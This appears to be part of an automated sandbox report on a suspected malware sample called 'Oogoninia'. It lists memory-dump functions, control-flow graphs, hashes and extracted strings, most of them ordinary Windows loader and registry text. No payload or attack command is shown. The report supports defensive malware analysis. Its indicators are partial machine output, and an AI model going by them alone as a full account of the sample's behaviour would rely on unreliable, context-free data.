                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                    • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                                                                                    • Instruction ID: 2b31bcc4a158946671b74a97661090b9e56dbbcbef6738157e9c676b7350d0db
                                                                                                                                                                                    • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DF0C272515518FFCB029FA5DC00D9EBBA8EF16360B2540AAF800F7310D274EE019BA9

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:0%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                    Signature Coverage:100%
                                                                                                                                                                                    Total number of Nodes:1
                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                    execution_graph 58966 32562b90 LdrInitializeThunk

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 325634E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 4 325634e0-325634ec LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: b79dd09f99b6053538c287343f65334a80b45053de71a4fcb8bc69cc125a4480
                                                                                                                                                                                    • Instruction ID: f81bc2f613d0f96207a2cc0d3c78e62e373beef1acb297f8d1781fe79bdc032e
                                                                                                                                                                                    • Opcode Fuzzy Hash: b79dd09f99b6053538c287343f65334a80b45053de71a4fcb8bc69cc125a4480
                                                                                                                                                                                    • Instruction Fuzzy Hash: FD90023164510402D600615D572874610454BD0211F61CC16A0514528DD7A58A5975A2
                                                                                                                                                                                    Function 32562BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1 32562bc0-32562bcc LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 6c81477dc930d1327a4ca66173442cb05be93d97f9840270dbbb7c941a9016c1
                                                                                                                                                                                    • Instruction ID: 80b5e0d7ccbf742be9097afc2728dccb571b79f8f329c8111888f9089766abe0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c81477dc930d1327a4ca66173442cb05be93d97f9840270dbbb7c941a9016c1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8790023124100402D600659D661C68600454BE0311F51D816A5114515ED67589997131
                                                                                                                                                                                    Function 32562B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 32562b90-32562b9c LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 9812bf22ca9316b8e9bef2f026af94671321bf825ccb82a1ff677fe9ee6df46f
                                                                                                                                                                                    • Instruction ID: fc9ac89c1d3511ac4b303e9cddd647b932cfba3563f800ed0038a4f405b577a4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9812bf22ca9316b8e9bef2f026af94671321bf825ccb82a1ff677fe9ee6df46f
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC90023124108802D610615D961878A00454BD0311F55CC16A4514618DD6A589997121
                                                                                                                                                                                    Function 32562EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 3 32562eb0-32562ebc LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: db145c5dd283d5769aa04524e8ee534fadc47d9763ebe68713b3f6875d9739c4
                                                                                                                                                                                    • Instruction ID: a05f3c40ba408c72e1bd6ec7cafbe9305c5c88d6911e441e62e0015a67a48cd5
                                                                                                                                                                                    • Opcode Fuzzy Hash: db145c5dd283d5769aa04524e8ee534fadc47d9763ebe68713b3f6875d9739c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0690023124140402D600615D5A2874B00454BD0312F51C816A1254515DD63589597571
                                                                                                                                                                                    Function 32562D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 2 32562d10-32562d1c LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: e2fea17d15bbed7e134870f928a93eab8f34f9cad90dd4aa5b28294299318ec8
                                                                                                                                                                                    • Instruction ID: 0e859ce69c73657e8f203bd75fb0b6ea7ee49549f47d8914bb2f1b392e0bf37e
                                                                                                                                                                                    • Opcode Fuzzy Hash: e2fea17d15bbed7e134870f928a93eab8f34f9cad90dd4aa5b28294299318ec8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4890023124100413D611615D571874700494BD0251F91CC17A0514518DE6668A5AB121

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 325C9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 556 325c9060-325c90a9 557 325c90f8-325c9107 556->557 558 325c90ab-325c90b0 556->558 559 325c9109-325c910e 557->559 560 325c90b4-325c90ba 557->560 558->560 561 325c9893-325c98a7 call 32564b50 559->561 562 325c9215-325c923d call 32568f40 560->562 563 325c90c0-325c90e4 call 32568f40 560->563 570 325c925c-325c9292 562->570 571 325c923f-325c925a call 325c98aa 562->571 572 325c90e6-325c90f3 call 325e92ab 563->572 573 325c9113-325c91b4 GetPEB call 325cd7e5 563->573 576 325c9294-325c9296 570->576 571->576 582 325c91fd-325c9210 RtlDebugPrintTimes 572->582 583 325c91b6-325c91c4 573->583 584 325c91d2-325c91e7 573->584 576->561 580 325c929c-325c92b1 RtlDebugPrintTimes 576->580 580->561 590 325c92b7-325c92be 580->590 582->561 583->584 585 325c91c6-325c91cb 583->585 584->582 586 325c91e9-325c91ee 584->586 585->584 588 325c91f0 586->588 589 325c91f3-325c91f6 586->589 588->589 589->582 590->561 592 325c92c4-325c92df 590->592 593 325c92e3-325c92f4 call 325ca388 592->593 596 325c92fa-325c92fc 593->596 597 325c9891 593->597 596->561 598 325c9302-325c9309 596->598 597->561 599 325c947c-325c9482 598->599 600 325c930f-325c9314 598->600 603 325c961c-325c9622 599->603 604 325c9488-325c94b7 call 32568f40 599->604 601 325c933c 600->601 602 325c9316-325c931c 600->602 606 325c9340-325c9391 call 32568f40 RtlDebugPrintTimes 601->606 602->601 605 325c931e-325c9332 602->605 608 325c9674-325c9679 603->608 609 325c9624-325c962d 603->609 621 325c94b9-325c94c4 604->621 622 325c94f0-325c9505 604->622 612 325c9338-325c933a 605->612 613 325c9334-325c9336 605->613 606->561 648 325c9397-325c939b 606->648 610 325c967f-325c9687 608->610 611 325c9728-325c9731 608->611 609->593 616 325c9633-325c966f call 32568f40 609->616 617 325c9689-325c968d 610->617 618 325c9693-325c96bd call 325c8093 610->618 611->593 620 325c9737-325c973a 611->620 612->606 613->606 633 325c9869 616->633 617->611 617->618 645 325c9888-325c988c 618->645 646 325c96c3-325c971e call 32568f40 RtlDebugPrintTimes 618->646 627 325c97fd-325c9834 call 32568f40 620->627 628 325c9740-325c978a 620->628 629 325c94cf-325c94ee 621->629 630 325c94c6-325c94cd 621->630 624 325c9507-325c9509 622->624 625 325c9511-325c9518 622->625 634 325c950f 624->634 635 325c950b-325c950d 624->635 636 325c953d-325c953f 625->636 658 325c983b-325c9842 627->658 659 325c9836 627->659 640 325c978c 628->640 641 325c9791-325c979e 628->641 632 325c9559-325c9576 RtlDebugPrintTimes 629->632 630->629 632->561 662 325c957c-325c959f call 32568f40 632->662 642 325c986d 633->642 634->625 635->625 649 325c951a-325c9524 636->649 650 325c9541-325c9557 636->650 640->641 643 325c97aa-325c97ad 641->643 644 325c97a0-325c97a3 641->644 652 325c9871-325c9886 RtlDebugPrintTimes 642->652 653 325c97af-325c97b2 643->653 654 325c97b9-325c97fb 643->654 644->643 645->593 646->561 688 325c9724 646->688 660 325c939d-325c93a5 648->660 661 325c93eb-325c9400 648->661 655 325c952d 649->655 656 325c9526 649->656 650->632 652->561 652->645 653->654 654->652 666 325c952f-325c9531 655->666 656->650 664 325c9528-325c952b 656->664 667 325c984d 658->667 668 325c9844-325c984b 658->668 659->658 669 325c93a7-325c93d0 call 325c8093 660->669 670 325c93d2-325c93e9 660->670 663 325c9406-325c9414 661->663 685 325c95bd-325c95d8 662->685 686 325c95a1-325c95bb 662->686 672 325c9418-325c946f call 32568f40 RtlDebugPrintTimes 663->672 664->666 674 325c953b 666->674 675 325c9533-325c9535 666->675 676 325c9851-325c9857 667->676 668->676 669->672 670->663 672->561 692 325c9475-325c9477 672->692 674->636 675->674 681 325c9537-325c9539 675->681 682 325c985e-325c9864 676->682 683 325c9859-325c985c 676->683 681->636 682->642 689 325c9866 682->689 683->633 690 325c95dd-325c960b RtlDebugPrintTimes 685->690 686->690 688->611 689->633 690->561 694 325c9611-325c9617 690->694 692->645 694->620
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: $ $0
                                                                                                                                                                                    • API String ID: 3446177414-3352262554
                                                                                                                                                                                    • Opcode ID: 1f21eb81b40fa4520ca18c7ffb2caadeb1bb64c9821b796db8349604f00b567c
                                                                                                                                                                                    • Instruction ID: ffde98dea6e3e0b3bd6584656ad3bb593eeb2ee49660a0c237a37633c9c09bb4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f21eb81b40fa4520ca18c7ffb2caadeb1bb64c9821b796db8349604f00b567c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F3217B55083818FD350CFA8C484B6BBBE5BF88358F44492EF59987350EB74EA48CB52
                                                                                                                                                                                    Function 32558540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 765 32558540-325585a1 766 325585a7-325585b8 765->766 767 325950a2-325950a8 765->767 767->766 768 325950ae-325950bb GetPEB 767->768 768->766 769 325950c1-325950c4 768->769 770 325950e1-32595107 call 32562c00 769->770 771 325950c6-325950d0 769->771 770->766 776 3259510d-32595111 770->776 771->766 772 325950d6-325950df 771->772 775 32595138-3259514c call 325253c0 772->775 781 32595152-3259515e 775->781 776->766 778 32595117-3259512c call 32562c00 776->778 778->766 785 32595132 778->785 783 32595164-32595178 781->783 784 32595367-32595373 call 32595378 781->784 787 3259517a 783->787 788 32595196-3259520c 783->788 784->766 785->775 791 3259517c-32595183 787->791 792 3259520e-32595240 call 3251fcf0 788->792 793 32595245-32595248 788->793 791->788 794 32595185-32595187 791->794 805 32595358-3259535d call 325aa130 792->805 796 3259531f-32595322 793->796 797 3259524e-3259529f 793->797 798 32595189-3259518c 794->798 799 3259518e-32595190 794->799 800 32595360-32595362 796->800 801 32595324-32595353 call 3251fcf0 796->801 806 325952d9-3259531d call 3251fcf0 * 2 797->806 807 325952a1-325952d7 call 3251fcf0 797->807 798->791 799->788 799->800 800->781 801->805 805->800 806->805 807->805
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • 8, xrefs: 325950EE
                                                                                                                                                                                    • corrupted critical section, xrefs: 325952CD
                                                                                                                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 325952D9
                                                                                                                                                                                    • Critical section address, xrefs: 32595230, 325952C7, 3259533F
                                                                                                                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 3259534E
                                                                                                                                                                                    • Critical section debug info address, xrefs: 3259522A, 32595339
                                                                                                                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 325952ED
                                                                                                                                                                                    • Critical section address., xrefs: 3259530D
                                                                                                                                                                                    • Thread identifier, xrefs: 32595345
                                                                                                                                                                                    • Invalid debug info address of this critical section, xrefs: 325952C1
                                                                                                                                                                                    • undeleted critical section in freed memory, xrefs: 32595236
                                                                                                                                                                                    • double initialized or corrupted critical section, xrefs: 32595313
                                                                                                                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 32595215, 325952A1, 32595324
                                                                                                                                                                                    • Address of the debug info found in the active list., xrefs: 325952B9, 32595305
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                    • API String ID: 0-2368682639
                                                                                                                                                                                    • Opcode ID: f8d9b5b740f71d82c65c02fbd86134cd85bfeadddf1c9e9f913146c57d3a5888
                                                                                                                                                                                    • Instruction ID: 2fd82046bf788cd4657e7c86a009695e751f16e61c666b72515f504ffd70d114
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8d9b5b740f71d82c65c02fbd86134cd85bfeadddf1c9e9f913146c57d3a5888
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E8178B1901748BFEB10CFA4DD44FEEBBB5AB48754F20819AE904B7280C775AA45CF64
                                                                                                                                                                                    Function 3251D2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.T2
                                                                                                                                                                                    • API String ID: 0-1220417600
                                                                                                                                                                                    • Opcode ID: 24c3aba0f8c59280fe6ec2a29a181e11c88bf17ae3a22b260669f776af0e45db
                                                                                                                                                                                    • Instruction ID: baefb13b8219ed12885c2b91b0c8d5863bafbc8848af364567600a7a3ae22efd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 24c3aba0f8c59280fe6ec2a29a181e11c88bf17ae3a22b260669f776af0e45db
                                                                                                                                                                                    • Instruction Fuzzy Hash: CEB17EB69093519FEB15CE18C440B5BBBE8AF84758F41492EF984D7200DBB5EE48CB92
                                                                                                                                                                                    Function 325C86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                    • API String ID: 0-2515994595
                                                                                                                                                                                    • Opcode ID: 1bceb1be3c66341d852a6eecae7d5d08b3a97dd4692b23d32c74300a1e1f12be
                                                                                                                                                                                    • Instruction ID: b8b1f21dd2e1614f2bc949b2f59a1b87ca4df6c42e10e87f84d35480256640cf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bceb1be3c66341d852a6eecae7d5d08b3a97dd4692b23d32c74300a1e1f12be
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B51AFB5508321ABD316CF54DA48BABBBE8EFC4364F40491DA96483640FB75D704CB92
                                                                                                                                                                                    Function 3251640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlDebugPrintTimes.NTDLL ref: 3251651C
                                                                                                                                                                                      • Part of subcall function 32516565: RtlDebugPrintTimes.NTDLL ref: 32516614
                                                                                                                                                                                      • Part of subcall function 32516565: RtlDebugPrintTimes.NTDLL ref: 3251665F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 325797B9
                                                                                                                                                                                    • apphelp.dll, xrefs: 32516446
                                                                                                                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3257977C
                                                                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 325797A0, 325797C9
                                                                                                                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32579790
                                                                                                                                                                                    • LdrpInitShimEngine, xrefs: 32579783, 32579796, 325797BF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                    • API String ID: 3446177414-204845295
                                                                                                                                                                                    • Opcode ID: cd037a1ede439c5b71f707cd4999c46478dda268a2f9460faa8950f168faab2f
                                                                                                                                                                                    • Instruction ID: 91eed18e7af78f29698a45c2481b1f6b789c0e7d4e80fd48af4dc9c4febf70ba
                                                                                                                                                                                    • Opcode Fuzzy Hash: cd037a1ede439c5b71f707cd4999c46478dda268a2f9460faa8950f168faab2f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B51B071689300ABE715CF24C891F9B77E4EFC4384F80491AF68597160DB30EB44CB92
                                                                                                                                                                                    Function 3251D02D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • @, xrefs: 3251D09D
                                                                                                                                                                                    • @, xrefs: 3251D24F
                                                                                                                                                                                    • Control Panel\Desktop\LanguageConfiguration, xrefs: 3251D136
                                                                                                                                                                                    • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3251D202
                                                                                                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3251D263
                                                                                                                                                                                    • h.T2, xrefs: 3257A5D2
                                                                                                                                                                                    • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3251D06F
                                                                                                                                                                                    • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3251D0E6
                                                                                                                                                                                    • @, xrefs: 3251D2B3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.T2
                                                                                                                                                                                    • API String ID: 0-2166235198
                                                                                                                                                                                    • Opcode ID: c8134e33a8d918fb9d16ad9f8a71044beaeffa101b825f38ec49f7f0ddf15deb
                                                                                                                                                                                    • Instruction ID: a28665896c66ce9ce480c2dafd3eef6f9bdaa65e3563bcdf2b8a2b439e4391b9
                                                                                                                                                                                    • Opcode Fuzzy Hash: c8134e33a8d918fb9d16ad9f8a71044beaeffa101b825f38ec49f7f0ddf15deb
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2A19EB14493459FE721CF14C540B9BBBE8AFC8759F40492EF99897240DBB9DA08CF92
                                                                                                                                                                                    Function 3254D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlDebugPrintTimes.NTDLL ref: 3254D879
                                                                                                                                                                                      • Part of subcall function 32524779: RtlDebugPrintTimes.NTDLL ref: 32524817
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
